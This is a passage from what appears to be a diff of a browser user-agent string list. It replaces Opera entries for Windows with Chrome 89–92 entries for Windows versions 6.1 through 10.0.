Safari/537.36 OPR/76.0.4017.175 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.154 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.107 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 OPR/76.0.4017.94 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.218 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 OPR/75.0.3969.171 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.149 -Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 -Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 OPR/75.0.3969.141 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like 